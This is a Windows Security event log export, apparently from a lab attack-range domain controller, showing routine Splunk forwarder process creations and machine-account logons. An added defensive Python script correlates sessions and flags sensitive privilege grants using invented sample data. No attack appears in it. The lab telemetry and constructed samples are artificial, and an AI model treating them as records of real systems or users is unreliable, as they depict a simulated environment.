Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:14:18 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264481
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x815437
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:14:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264484
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x818BC0
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:14:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264483
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x818BC0
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 62686
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:14:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264482
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x818BC0
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:15:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264486
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x11cc
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:15:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264485
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1ba0
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:15:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264488
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x14e4
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:15:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264487
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1ab0
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:15:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264489
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x143c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:15:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264491
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1bcc
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:15:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264490
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1a80
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:15:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264494
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x81C509
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
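The event text above explains three things a reader of this export has to do by hand: decode the 4688 Token Elevation Type (every process here carries %%1936, Type 1, because splunkd.exe runs as a service under SYSTEM), pair each 4624 with its 4634 through the Logon ID (the 4634 for 0x815437 has no 4624 in this section, which is exactly the situation the "only unique between reboots" caveat warns about), and read the 4672 privilege list per session. The following Python is an added example, not code from the page, Splunk or Microsoft. It parses the Splunk-rendered layout shown above, keys message fields by their section so the Subject and New Logon Logon IDs stay distinct, and runs the three checks. The sample export is constructed to match the layout of the events above (same host and Logon IDs, most header fields dropped for brevity); the user account "alice" and the SENSITIVE privilege set are my own choices, and the %%1937/%%1938 codes for Type 2 and Type 3 come from Microsoft's 4688 documentation rather than from this page.

```python
"""Parse a Splunk-style Windows Security export and correlate logon sessions.
Added example, not the page's or Splunk's code; sample constructed, 'alice' invented."""
import re

SAMPLE = r"""
04/19/2021 03:14:55 PM
EventCode=4624
Subject:
Logon ID: 0x0
New Logon:
Account Name: WIN-DC-209$
Logon ID: 0x818BC0
04/19/2021 03:14:55 PM
EventCode=4672
Subject:
Account Name: WIN-DC-209$
Logon ID: 0x818BC0
Privileges: SeSecurityPrivilege
SeDebugPrivilege
04/19/2021 03:15:08 PM
EventCode=4688
Process Information:
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Token Elevation Type indicates the type of token that was assigned to the new process.
04/19/2021 03:15:55 PM
EventCode=4634
Subject:
Logon ID: 0x815437
04/19/2021 03:15:55 PM
EventCode=4634
Subject:
Account Name: WIN-DC-209$
Logon ID: 0x818BC0
04/19/2021 03:16:02 PM
EventCode=4672
Subject:
Account Name: alice
Logon ID: 0x81D0A1
Privileges: SeDebugPrivilege
"""

TS_RE = re.compile(r"^\d{2}/\d{2}/\d{4} \d{2}:\d{2}:\d{2} [AP]M$", re.M)
TOKEN_ELEVATION = {"%%1936": 1, "%%1937": 2, "%%1938": 3}  # Type 1/2/3 of the 4688 text
SENSITIVE = {"SeDebugPrivilege", "SeTcbPrivilege", "SeLoadDriverPrivilege", "SeBackupPrivilege"}


def parse_events(text):
    """One dict per record. Header lines are Key=Value; message lines are 'Field: Value'
    keyed 'Section/Field' so Logon ID under Subject and under New Logon stay apart; a
    space-free line continues the previous value (Privileges); boilerplate is skipped."""
    events = []
    starts = [m.start() for m in TS_RE.finditer(text)]
    for start, end in zip(starts, starts[1:] + [len(text)]):
        lines = text[start:end].splitlines()
        ev, section, last = {"timestamp": lines[0]}, None, None
        for line in lines[1:]:
            if line.endswith(":"):
                section = line[:-1]
            elif ": " in line:
                key, value = line.split(": ", 1)
                last = f"{section}/{key}" if section else key
                ev[last] = value
            elif "=" in line and section is None:
                ev.update([line.split("=", 1)])
            elif last and " " not in line:
                ev[last] += " " + line
        events.append(ev)
    return events


def correlate_sessions(events):
    """Join 4624/4672/4634 on Logon ID (under New Logon for 4624, under Subject otherwise)."""
    sessions = {}
    for ev in events:
        code = ev.get("EventCode")
        if code not in ("4624", "4672", "4634"):
            continue
        lid = ev["New Logon/Logon ID" if code == "4624" else "Subject/Logon ID"]
        s = sessions.setdefault(lid, {"account": None, "logon": None, "logoff": None, "privileges": []})
        s["account"] = s["account"] or ev.get("New Logon/Account Name") or ev.get("Subject/Account Name")
        if code == "4624":
            s["logon"] = ev["timestamp"]
        elif code == "4672":
            s["privileges"] = ev["Subject/Privileges"].split()
        else:
            s["logoff"] = ev["timestamp"]
    return sessions


def find_anomalies(events, sessions):
    """Triage notes: a logoff with no logon in scope, a sensitive privilege on a user
    account (machine accounts and SYSTEM hold these routinely on a DC), a Type 1 token."""
    notes = []
    for lid, s in sessions.items():
        if s["logoff"] and not s["logon"]:
            notes.append(f"{lid}: 4634 with no 4624 in scope")
        held = SENSITIVE & set(s["privileges"])
        if held and s["account"] and not s["account"].endswith("$"):
            notes.append(f"{lid}: {s['account']} granted {sorted(held)}")
    for ev in events:
        if TOKEN_ELEVATION.get(ev.get("Process Information/Token Elevation Type")) == 1:
            notes.append(f"type 1 token: {ev['Process Information/New Process Name']}")
    return notes
```

Feed the whole export to parse_events, then pass the result through correlate_sessions and find_anomalies. On the sample it reports the orphan logoff for 0x815437, the SeDebugPrivilege grant to alice, and the Type 1 token for splunk-admon.exe, and it stays quiet about the machine account's identical privilege list, which is the baseline for a domain controller's own service logons. The section-prefixed keys are the part worth keeping: a flat "Logon ID" lookup on a 4624 would silently return the Subject's 0x0 instead of the new session's ID and every correlation would fail.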
04/19/2021 03:15:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264493
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x81C509
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 62699
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:15:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264492
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x81C509
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:16:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264496
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1780
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:16:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264495
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x18e8
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:16:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264497
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1b58
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:16:10 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264498
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1844
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:16:11 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264499
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Delegation
New Logon:
Security ID: ATTACKRANGE\WIN-HOST-797$
Account Name: WIN-HOST-797$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x81DF3F
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {DC6104D6-8644-C624-5E2A-37E68DB9CAB8}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: 10.0.1.15
Source Port: 53700
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:16:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264500
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
